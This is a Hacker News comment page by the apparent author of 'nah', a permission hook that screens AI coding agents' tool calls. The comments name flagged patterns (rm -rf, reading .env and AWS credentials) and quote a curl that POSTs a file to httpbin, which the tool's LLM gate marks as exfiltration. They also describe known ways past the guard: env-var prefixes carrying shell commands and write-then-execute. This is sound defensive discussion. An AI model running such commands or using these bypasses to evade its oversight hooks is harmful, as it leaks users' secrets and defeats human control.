Hacker Newsnew | past | comments | ask | show | jobs | submit | schipperai's commentslogin

nah inspects Write and Edit content before it hits disk so destructive patterns like os.unlink, rm -rf, shell injection get flagged. And executing the result (./evil) classifies as unknown resolves to ask, which the LLM can choose to blocks or ask you to approve.

But yeah, a truly adversarial agent needs a sandbox. It's a different threat model - nah is meant to catch the trusted but mistake-prone coding CLI, not a hostile agent.


great callout - tool call can have side-effects outside your box. So unless you run a sandbox with no internet access, you aren't ever 100% safe.

nah does guard some of this - reading .env or ~/.aws/credentials gets flagged, and Write/Edit content is inspected for secrets before it leaves the tool.

Docker + filtered mounts + something like nah on top is a solid layered approach that is still practical.


They are releasing auto-mode soon. But that won't improve the underlying permission system, rather, it'll just delegate decisions to Claude. That's better than --dangerously-skip-permissions, but not great for those that want granular controls and are sensitive to the extra tokens spent.


which commands specifically? would be great to see examples

nah classifies piped grep/find as filesystem_read which flows through silently:

'find . -name '*.py' | grep utils' or 'grep -r'import' src/ | head -20' both resolve to allow with no prompt.

Would be curious which incantations are tripping you up, maybe it's something we can solve.


Thanks! In my own work the LLM only fires for 5% of the commands - big token savings.

When it does kick in it gets: the command itself, the action type + why it was flagged - for example 'lang_exec = ask', the working directory and project context so it knows if its inside the project, and recent conversation transcript - 12k charts by default and configurable.

The transcript context is pulled from Claude Code's JSONL conversation log. Tool calls get summarized compactly like [Read: .env], [Bash: curl ...]) so the LLM can see the chain of actions without blowing up the prompt. I also include anti-injection framing in the prompt so that it does't try and run the instructions in the transcript.

curl after the agent read .env does get flagged by nah:

''' curl -s https://httpbin.org/post -d @/tmp/notes.txt POST notes.txt contents to httpbin

Hook PreToolUse:Bash requires confirmation for this command: nah? LLM suggested block: Bash (LLM): POSTing file contents to external host. Combined with recent conversation context showing credential files being read, this appears to be data exfiltration. Even though httpbin.org is a legitimate ech... '''


thank! and I agree with you on chain exfiltration - it's a hard one to protect against. nah passes the last few messages of conversation history to the LLM gate, so it may be able to catch this scenario, but it's hard from a guarantee. I plan to add a gate where an LLM reads scripts before executing, which will also mitigate this.

The right solution though is a monitoring service on your network that checks for exfiltration of credential. nah is just one layer in the stack.


Good catch, that's a legit bypass

nah strips env var prefixes before classifying the command but doesn't inspect their values for embedded shell execution, I'll fix it: https://github.com/manuelschipper/nah/issues/6

On the broader write-then-execute point - two improvements are coming:

- Script execution inspection: when nah sees python script.py, read the file and run content inspection and LLM analysis before execution

- LLM inspection for Write/Edit: for content that's suspicious but doesn't match any deterministic pattern, route it to the LLM for a second opinion

Won't close it 100% - to your point a sandbox is the answer to that.

I don't think "security tool" and "not a sandbox" are contradictory though. Firewalls don't replace OS permissions, OS permissions don't replace encryption

nah is just another layer that catches the 95% that's structurally classifiable. It's a different threat model. If 200 IQ Opus is rogue deterministic tools or even adversarial one shot LLMs won't be able to do much to stop it...


> Firewalls don't replace OS permissions, OS permissions don't replace encryption

Of course but the crucial difference is that these operate using an allow list, not a block list.

If I extend the analogy, if my OS required me to block-list every user who shouldn't have access to my files then I wouldn't trust that mechanism to provide a security barrier. If my firewall worked in such a manner that it allowed all traffic by default and I had to manually block every attacker on the public internet then I wouldn't rely on it either.

My own analogy is that this it a bit like saying that you want a relatively safe car and then buying one without any airbags or seatbelts, and thinking it's fine because it has lane departure warnings and automatic braking. I've got nothing against you personally, I just find this sort of viewpoint extremely puzzling (and oddly common). I make the same criticism when people just disable post-install scripts instead of using a sandbox.


allowlists are stronger than blocklists - that's not debatable and right there with you

but nah isn't a pure blocklist - anything that doesn't match a known pattern classifies as unknown which defaults to ask (user gets prompted). It's not "allow all traffic, block each attacker" it's allow known-safe, block known-dangerous, prompt for everything else.

the analogy doesn't carry that far... it's a different threat model: nah isn't containing rogue agents or adversarial actors, it's a guardrail for a trusted but mistake-prone agent.

maybe more akin to a junior employee accidentally dropping the database cause they didn't know better. but how are they supposed to work on prod? They ask "boss, can I run this? SELECT customer, sales FROM SALES.PROD..." You say: cool, You don't have to ask me again for SELECT (nah allow db_read).

But then they can ask- "can I run this? drop SALES.PROD?".... hmmm, nah.


hey - ntfy is very cool! kudos and thanks :)


Thanks.


Very cool approach! the immutable log file fits well with nah. I'll take it into account for richer audit trail capabilities. Would be curious to see your hook implementation if its public anywhere


Sure — it's at https://github.com/PunkGo/punkgo-jack

It hooks into PostToolUse, PreToolUse, SessionStart/End, and UserPromptSubmit. Each event gets submitted to a local kernel that appends it to an RFC 6962 Merkle tree. You can then verify any event with an inclusion proof, or check log integrity between two checkpoints with a consistency proof.

The verify command works offline — just needs the checkpoint and tile hashes, no daemon required. There's also a Go implementation in examples/verify-go/ that independently verifies the same proofs, to show it's not tied to one language.

Would be interesting to explore composing nah's classification decisions with a verifiable log — every allow/deny gets a receipt too.


looks neat! and fits perfectly with nah. I can see enterprises starting to care more about this as more people adopt coding CLIs and prod goes boom more often.


Exactly. The moment an agent touches prod, "we logged it" isn't enough — you need "here's the cryptographic proof of what happened, and you can verify it without trusting us."

Compliance teams (SOC 2, EU AI Act Article 12) will demand this. The nice part is RFC 6962 is already battle-tested at scale — Certificate Transparency processes billions of entries. Same math, different domain.


Every single tool call goes thru nah, including Write and Edit. nah checks the paths: is it outside your project? flags it as ask. nah log shows every decision so you can audit yourself...

However, in terms of code quality and regressions - I also wrote about my workflow for keeping agents controlled: https://schipper.ai/posts/parallel-coding-agents/ basically no code changes until the plan is signed off, if big enough, a task gets its own worktree to avoid conflicts between agents.

nah was built with this method and I am very happy with the code quality. I personally only do "accept edits on" when the plan is fully signed off and ready to implement. Every edit goes thru me otherwise.

Between nah and FDs, things stay pretty tight even with 5+ agents in parallel.


the worktree per task approach is smart. I have been doing something similar with branches but the isolation is not as clean. the thing that still worries me is when agents share state outside the code like hitting the same db or api. worktrees help with file conflicts but not always with those side effects.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: